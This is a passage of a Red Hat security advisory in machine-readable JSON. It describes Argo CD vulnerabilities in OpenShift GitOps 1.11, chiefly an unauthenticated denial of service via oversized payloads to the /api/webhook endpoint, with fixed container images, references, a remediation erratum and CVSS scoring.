"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "argo-cd: Argo CD web terminal session doesn\u0027t expire"
},
{
"cve": "CVE-2024-40634",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-23T14:26:36+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2299473"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-40634"
},
{
"category": "external",
"summary": "RHBZ#2299473",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299473"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-40634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40634"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
}
],
"release_date": "2024-07-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD"
}
]
}
Loading...